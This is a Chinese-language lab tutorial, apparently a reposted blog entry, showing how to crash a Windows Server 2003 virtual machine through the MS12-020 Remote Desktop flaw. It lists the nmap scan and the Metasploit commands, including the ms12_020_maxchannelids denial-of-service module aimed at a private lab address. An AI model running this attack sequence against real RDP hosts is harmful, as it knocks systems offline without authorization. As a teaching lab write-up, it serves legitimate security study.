
- 基本原理:利用 *** 作系统内核的缺陷,发送大量数据包,则这个漏洞可能造成拒绝服务攻击或允许远程执行代码。
- ms12-020漏洞的定义是指 *** 作系统的远程桌面协议存在重大漏洞,入侵者(黑客)可以通过向远程桌面默认端口(3389)发一系列特定RDP包,从而获取超级管理员权限,进而入侵系统。根据实际被入侵终端进行分析,开放远程桌面服务并使用默认的3389端口的会成为攻击目标。根据微软的安全公告,Windows全系列 *** 作系统(WinXP/Vista/Win7/Win2000/ Win2003/Win2008)均存在受控威胁。
- 在攻击之前首先需要几个必须条件:
- 1、本次攻击实验在虚拟机中进行,需要安装kail linux攻击机和win server 2003目标靶机,利用kail linux自带的msfconsole进行攻击;
- 红色方框标注的工具
- 2、目标机相应的攻击端口3389需要打开;
- 3、确保目标机与攻击机可以相互ping通。
- 1、本次攻击实验在虚拟机中进行,需要安装kail linux攻击机和win server 2003目标靶机,利用kail linux自带的msfconsole进行攻击;
- 攻击流程:
- 1、确保win 2003能够上网,并且开启相应的远程连接(最好关掉掉防火墙),然后查看win2003主机上的IP地址;
- 主机能够上网
- 查看win 2003的IP地址
- 2、确保能够在kail linux中能够ping通win 2003主机;
- 网络连接良好
- 3、信息收集,使用nmap进行扫描,查看开放的端口;
- 所需的3389端口已经处于打开状态
- 4、漏洞挖掘,首先进入msfconsole运行msf,查找有关MS12020的aux;
- 这里有两个aux,第一个是攻击的aux,第二个是检测是否具有MS12020漏洞的aux,我们先使用第一个aux对目标机进行检测
- 5、配置参数,配置完以后show options 这里已经配置完毕了;
- 6、接下来exploit开始检测,这里检测出可以使用MS12020进行攻击;
- 7、漏洞利用,接下来我们就可以使用第一个aux模块进行攻击了,设置好攻击IP地址后检查参数配置,然后进行攻击;
- 8、攻击成功。
- win 2003主机出现蓝屏错误代码,表示攻击成功。
- ******
攻击命令顺序依次如下:
(1)nmap 靶机ip地址 (确保3389端口打开)
(2)msfconsole命令启动Metasploit
(3)msf6 > search ms12-020
(4)msf6 > use auxiliary/scanner/rdp/ms12_020_check
(5)msf6 > set rhosts
(6)msf6 > show options
(7)msf6 > exploit
(8)msf6 > use auxiliary/dos/windows/rdp/ms12_020_maxchannelids //选择攻击
(9)msf6 > set rhost 192.168.197.132 //设置靶机的机IP地址
(10)msf6 > exploit //进行攻击
欢迎分享,转载请注明来源:内存溢出
微信扫一扫
支付宝扫一扫
评论列表(0条)